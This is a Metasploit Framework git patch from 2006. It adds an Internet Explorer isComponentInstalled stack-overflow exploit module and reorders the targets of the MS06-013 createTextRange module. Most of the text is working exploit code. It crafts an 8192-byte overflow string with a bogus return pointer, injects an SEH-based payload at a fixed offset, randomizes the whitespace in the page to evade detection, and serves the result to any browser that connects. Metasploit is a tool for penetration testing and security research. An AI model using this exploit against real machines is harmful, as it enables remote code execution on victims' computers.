From b2fbf8eb547f22cf9c2af618dd879d388cba5c0f Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 17 Dec 2006 08:03:43 +0000 Subject: [PATCH] Addition of the isComponentInstalled() exploit and updates to the createTextRange() module git-svn-id: file:///home/svn/framework3/trunk@4218 4d416f70-5f16-0410-b530-b9f4589650da --- .../browser/ie_iscomponentinstalled.rb | 105 ++++++++++++++++++ .../browser/ms06_013_createtextrange.rb | 3 +- 2 files changed, 107 insertions(+), 1 deletion(-) create mode 100644 modules/exploits/windows/browser/ie_iscomponentinstalled.rb diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb new file mode 100644 index 0000000000..aeeff86d09 --- /dev/null +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -0,0 +1,105 @@ +require 'msf/core' + +module Msf + +class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote + + include Exploit::Seh + include Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Internet Explorer isComponentInstalled Overflow', + 'Description' => %q{ + This module exploits a stack overflow in Internet Explorer. This bug was + patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'hdm', + ], + 'Version' => '$Revision: 3783 $', + 'References' => + [ + [ 'BID', '16870' ], + ], + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x5c\x0a\x0d\x22", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + ['Windows XP SP0 with Internet Explorer 6.0', { 'Ret' => 0x71ab8e4a } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 24 2006')) + end + + def autofilter + false + end + + def on_request_uri(cli, request) + + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # Create the overflow string + pattern = Rex::Text.rand_text_alpha(8192) + + # Smash the return address with a bogus pointer + pattern[744, 4] = [0xffffffff].pack('V') + + # Handle the exception :-) + seh = generate_seh_payload(target.ret) + pattern[6439, seh.length] = seh + + + # Build out the HTML response page + var_client = Rex::Text.rand_text_alpha(rand(30)+2) + var_html = Rex::Text.rand_text_alpha(rand(30)+2) + + content = %Q| + + + + + #{var_html} + + + | + + # Randomize the whitespace in the document + content.gsub!(/\s+/) do |s| + len = rand(100)+2 + set = "\x09\x20\x0d\x0a" + buf = '' + + while (buf.length < len) + buf << set[rand(set.length)].chr + end + + buf + end + + # Insert the shellcode + content.gsub!('__pattern__', pattern) + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + end + +end + +end diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 2ab3baea97..ca5f3c3b9d 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -48,8 +48,9 @@ class Exploits::Windows::Browser::MS06_013_CreateTextRange < Msf::Exploit::Remot 'Platform' => 'win', 'Targets' => [ - [ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ], [ 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', { 'Ret' => 0x746F9468 } ], + [ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ], + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 19 2006'))